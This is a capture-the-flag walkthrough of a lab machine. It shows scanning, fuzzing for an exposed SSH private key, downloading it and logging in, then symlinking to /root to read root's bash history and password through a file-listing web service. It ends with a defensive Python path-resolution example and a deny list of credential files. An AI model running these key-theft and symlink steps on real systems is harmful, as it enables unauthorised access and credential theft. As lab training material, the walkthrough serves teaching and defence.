Difficulty: easy
Kali: 192.168.56.104
Target: 192.168.56.153
As soon as the target booted I tried to open its web page in a browser, but it would not load at all; I even started to suspect my own network. A port scan showed that port 80 is not open.
Port scan
┌──(root㉿kali2)-[~/Desktop]
└─# nmap 192.168.56.153
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-16 20:18 CST
Nmap scan report for 192.168.56.153
Host is up (0.000094s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
3333/tcp open dec-notes
MAC Address: 08:00:27:F1:30:90 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds
Port 3333 is open and the scan did not identify the service; a web search says the port is associated with the Prosiak trojan. I did not look into that, and it turned out not to matter later.
Username fuzzing
Open port 3333 in the browser.
It shows a string of odd output, and the listing is of the home directory, so we can try fuzzing for usernames (requesting FUZZ/.ssh/id_rsa and filtering out the 8-word not-found response).
┌──(root㉿kali2)-[~/Desktop]
└─# ffuf -w /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -u http://192.168.56.153:3333/FUZZ/.ssh/id_rsa -fw 8
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.56.153:3333/FUZZ/.ssh/id_rsa
:: Wordlist : FUZZ: /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 8
________________________________________________
jan [Status: 200, Size: 2602, Words: 7, Lines: 39, Duration: 4ms]
Marc%20Ludlum [Status: 200, Size: 101, Words: 9, Lines: 4, Duration: 9ms]
Fuzzing turned up the user jan, and his SSH private key is readable over HTTP.
Download it with wget and connect with it; note that the key file's permissions must be changed to 600 first.
┌──(root㉿kali2)-[~/Desktop]
└─# wget http://192.168.56.153:3333/jan/.ssh/id_rsa
--2024-04-16 20:29:24-- http://192.168.56.153:3333/jan/.ssh/id_rsa
Connecting to 192.168.56.153:3333... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: ‘id_rsa’
id_rsa [ <=> ] 2.54K --.-KB/s in 0s
2024-04-16 20:29:24 (205 MB/s) - ‘id_rsa’ saved [2602]
┌──(root㉿kali2)-[~/Desktop]
└─# cat id_rsa
┌──(root㉿kali2)-[~/Desktop]
└─# ssh jan@192.168.56.153 -i id_rsa
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
jan@192.168.56.153's password:
┌──(root㉿kali2)-[~/Desktop]
└─# chmod 600 id_rsa
┌──(root㉿kali2)-[~/Desktop]
└─# ssh jan@192.168.56.153 -i id_rsa
Linux observer 6.1.0-11-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-4 (2023-08-08) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Apr 16 14:05:12 2024 from 192.168.56.104
jan@observer:~$
That gives a shell as jan directly.
Privilege escalation to root
sudo -l
sudo -l does show something:
jan@observer:~$ sudo -l
Matching Defaults entries for jan on observer:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User jan may run the following commands on observer:
(ALL) NOPASSWD: /usr/bin/systemctl -l status
But exploiting it did not go smoothly: simply typing !bash or !sh in the pager does not give a root shell.
jan@observer:~$ sudo /usr/bin/systemctl -l status
● observer
State: running
Units: 236 loaded (incl. loaded aliases)
Jobs: 0 queued
Failed: 0 units
Since: Tue 2024-04-16 13:43:02 CEST; 49min ago
systemd: 252.12-1~deb12u1
CGroup: /
├─init.scope
│ └─1 /sbin/init
├─system.slice
│ ├─cron.service
│ │ ├─315 /usr/sbin/cron -f
│ │ ├─322 /usr/sbin/CRON -f
│ │ ├─333 /bin/sh -c /opt/observer
│ │ └─336 /opt/observer
│ ├─dbus.service
│ │ └─318 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
│ ├─ifup@enp0s3.service
│ │ └─416 dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
│ ├─ssh.service
│ │ └─410 "sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups"
│ ├─system-getty.slice
│ │ └─getty@tty1.service
│ │ └─344 /sbin/agetty -o "-p -- \\u" --noclear - linux
│ ├─systemd-journald.service
│ │ └─207 /lib/systemd/systemd-journald
│ ├─systemd-logind.service
│ │ └─323 /lib/systemd/systemd-logind
│ ├─systemd-timesyncd.service
│ │ └─255 /lib/systemd/systemd-timesyncd
│ └─systemd-udevd.service
│ └─udev
│ └─239 /lib/systemd/systemd-udevd
└─user.slice
└─user-1000.slice
├─session-2.scope
│ ├─518 "sshd: jan [priv]"
│ ├─533 "sshd: jan@pts/0"
│ ├─534 -bash
│ ├─551 /usr/bin/systemctl -l
│ ├─552 pager
│ ├─553 sh -c "/bin/bash -c bash"
│ ├─554 bash
│ ├─643 su root
│ └─644 bash
├─session-5.scope
│ ├─670 "sshd: jan [priv]"
│ ├─676 "sshd: jan@pts/1"
│ ├─677 -bash
│ ├─687 sudo /usr/bin/systemctl -l status
│ ├─688 sudo /usr/bin/systemctl -l status
│ ├─689 /usr/bin/systemctl -l status
│ └─690 less
└─user@1000.service
└─init.scope
├─521 /lib/systemd/systemd --user
└─523 "(sd-pam)"
The escalation here is clever; it took many attempts before it worked.
Symlink
jan@observer:~$ ls -al
total 40
drwx------ 4 jan jan 4096 abr 16 14:34 .
drwxr-xr-x 3 root root 4096 ago 21 2023 ..
-rw------- 1 jan jan 133 ago 21 2023 .bash_history
-rw-r--r-- 1 jan jan 220 ago 21 2023 .bash_logout
-rw-r--r-- 1 jan jan 3526 ago 21 2023 .bashrc
drwxr-xr-x 3 jan jan 4096 ago 21 2023 .local
-rw-r--r-- 1 jan jan 807 ago 21 2023 .profile
drwx------ 2 jan jan 4096 ago 21 2023 .ssh
-rw------- 1 jan jan 24 ago 21 2023 user.txt
-rw------- 1 jan jan 54 ago 21 2023 .Xauthority
Seeing that jan can read his own .bash_history, I wondered whether a symlink to /root/.bash_history could be used, and it turned out it could.
A symlink pointing directly at /root/.bash_history did not work; symlinking to /root and then browsing that directory through the web service on port 3333 exposes root's command history.
jan@observer:~$ ln -s /root root
jan@observer:~$ ls -al
total 40
drwx------ 4 jan jan 4096 abr 16 14:37 .
drwxr-xr-x 3 root root 4096 ago 21 2023 ..
-rw------- 1 jan jan 133 ago 21 2023 .bash_history
-rw-r--r-- 1 jan jan 220 ago 21 2023 .bash_logout
-rw-r--r-- 1 jan jan 3526 ago 21 2023 .bashrc
drwxr-xr-x 3 jan jan 4096 ago 21 2023 .local
-rw-r--r-- 1 jan jan 807 ago 21 2023 .profile
lrwxrwxrwx 1 jan jan 5 abr 16 14:37 root -> /root
drwx------ 2 jan jan 4096 ago 21 2023 .ssh
-rw------- 1 jan jan 24 ago 21 2023 user.txt
-rw------- 1 jan jan 54 ago 21 2023 .Xauthority
The history leaked root's password; su to root with it and we are root.
jan@observer:~$ su root
Contraseña:
root@observer:/home/jan# id
uid=0(root) gid=0(root) grupos=0(root)
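As an added defender-side example (not code from the writeup or from the target machine), this is how a static file handler for a service like the one on port 3333 should map URL paths to files: it refuses `..`, refuses the `ln -s /root root` escape by checking that the resolved real path still lies under the served root, and denies `.ssh` and history files outright. The fixture tree, file contents and the `resolve_request` name are constructed for the demo.

```python
import os
import tempfile
from typing import Dict, Optional, Tuple

# Names a listing should never serve (the writeup fetched jan's key from /jan/.ssh/id_rsa).
DENIED_COMPONENTS = {".ssh", ".bash_history", ".Xauthority"}


def resolve_request(served_root: str, url_path: str) -> Optional[str]:
    """Map a URL path onto a file below served_root, or return None to refuse it.

    Refused: any '..' component, any denied dotfile/directory, and any path whose
    real location (after following symlinks) is outside served_root.
    """
    root = os.path.realpath(served_root)
    parts = [p for p in url_path.split("/") if p not in ("", ".")]
    if any(p == ".." for p in parts) or any(p in DENIED_COMPONENTS for p in parts):
        return None
    # realpath follows every symlink in the chain; the result must still sit below root.
    real = os.path.realpath(os.path.join(root, *parts))
    if os.path.commonpath([root, real]) != root:
        return None
    return real


def build_demo_tree() -> Tuple[str, str]:
    """Constructed fixture: a served 'home' tree plus a separate 'root' dir outside it."""
    base = tempfile.mkdtemp()
    served = os.path.join(base, "home")
    outside = os.path.join(base, "root")  # stands in for /root
    os.makedirs(os.path.join(served, "jan", ".ssh"))
    os.makedirs(outside)
    for path, text in [
        (os.path.join(served, "jan", ".bashrc"), "# constructed bashrc\n"),
        (os.path.join(served, "jan", ".ssh", "id_rsa"), "CONSTRUCTED-KEY\n"),
        (os.path.join(outside, ".bash_history"), "constructed history\n"),
    ]:
        with open(path, "w") as fh:
            fh.write(text)
    os.symlink(outside, os.path.join(served, "jan", "root"))  # mirrors 'ln -s /root root'
    return served, outside


def demo() -> Dict[str, Optional[str]]:
    served, _ = build_demo_tree()
    return {
        "bashrc": resolve_request(served, "/jan/.bashrc"),                  # allowed
        "ssh_key": resolve_request(served, "/jan/.ssh/id_rsa"),             # denied name
        "symlink_escape": resolve_request(served, "/jan/root/.bash_history"),  # escapes root
        "dotdot": resolve_request(served, "/jan/../../etc/passwd"),         # traversal
    }


if __name__ == "__main__":
    print(demo())
```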